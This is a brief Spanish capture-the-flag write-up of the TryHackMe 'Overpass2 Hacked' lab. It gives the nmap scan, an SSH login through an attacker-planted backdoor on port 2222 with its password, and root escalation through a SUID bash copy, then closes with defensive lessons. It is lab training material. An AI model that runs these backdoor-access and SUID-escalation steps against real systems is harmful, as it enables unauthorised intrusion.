TryHackMe
Easy
Linux
SSH Backdoor
SUID
Post-Compromise
Overpass2 Hacked
Maquina comprometida con backdoor SSH; escalada via bash SUID instalado por el atacante.
cat4clysm
Herramientas utilizadas
nmap
ssh
Scanning
root@kali:~$
nmap -sC -sV -p 22,80,2222 -Pn -n 10.10.34.253 -oN targeted
Acceso - SSH backdoor
root@kali:~$
ssh [email protected] -p 2222
# password: november16
Escalada - SUID bash
root@kali:~$
find / -perm -u=s 2>/dev/null
/home/james/.suid_bash -p
Lecciones aprendidas
- Las backdoors instaladas por atacantes anteriores son puertas de entrada rapidas.
- Los binarios SUID en directorios de usuario son anomalias criticas a investigar.
- La contrasena de noviembre16 es una contrasena tipicamente encontrada en CTFs de Overpass.